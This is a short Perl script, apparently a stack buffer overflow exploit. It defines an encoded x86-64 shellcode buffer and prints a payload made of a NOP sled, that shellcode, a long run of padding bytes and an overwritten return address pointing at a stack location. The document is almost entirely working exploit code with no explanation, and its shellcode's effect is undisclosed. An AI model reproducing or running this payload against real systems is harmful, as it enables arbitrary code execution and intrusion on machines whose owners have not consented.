my $buf = 
"\x48\x31\xc9\x48\x81\xe9\xe5\xff\xff\xff\x48\x8d\x05\xef" .
"\xff\xff\xff\x48\xbb\x01\xd0\xba\xd3\x8c\x33\x22\x44\x48" .
"\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x49\xe1\x73" .
"\x9b\x0d\xda\xc8\xbb\xfe\x2f\xf2\x5e\x89\xdc\xdd\xbb\xfe" .
"\x98\x01\x51\xd7\x03\x06\xaa\x9a\x52\x69\x9b\xbd\x6b\x05" .
"\x0c\x2c\x28\x45\x2c\x73\xd1\xd6\x8e\x6b\x29\xd6\xbc\xfe" .
"\x5e\x0e\x39\xa5\xa8\x13\x38\xf8\x4e\x0e\x39\x12\x5b\xfb" .
"\x87\xa4\xac\xe0\xa6\xa7\x94\xd6\x0c\x4f\x96\xb9\xeb\xa2" .
"\x1f\x61\xc2\xf5\x45\xdc\x4d\x16\x97\x86\x05\x73\x73\x84" .
"\x34\x60\x2b\xc2\x6c\x23\xaf\xb6\x3d\xb3\x4f\x88\x52\xef" .
"\x8d\x11\xbc\x91\xaf\xe5\x57\xab\x9c\xc2\x2c\x83\xd4\xd7" .
"\xc4\x80\xc7\xcb\x16\xe8\xa3\x80\x58\xa2\x40\x54\x04\xd2" .
"\xb5\x18\x15\x53\xc7\x94\x63\x78\x82\x8f\x5d\xeb\x94\xdc" .
"\xf5\x0f\x97\x9f\x07\x80\xef\xcc\x73\xec\xa4\xc7\xd8\x2a" .
"\xbc\xb1\x35\x16\x34\xfb\x45\xbd\xaf\xb7\x24\x83\xfd\xe5" .
"\x58\xa2\x4c\x73\x34\xd8\x0b\x80\x58\xb3\x9c\xcb\x34\x6c" .
"\x3d\xf6\x9a\x80\xf9\xcc\x16\xe8\xa2\x80\x58\xb4\x9f\x9b" .
"\x79\xa1\x78\x4f\x25\x05\x3a\x72\x7c\xe9\xfd\x8f\x5d\xea" .
"\xc5\xf1\x44";


0x7fffffffce10

print "\x90"x100 . $buf . "\x95"x3749 . "\x10\xce\xff\xff\xff\x7f"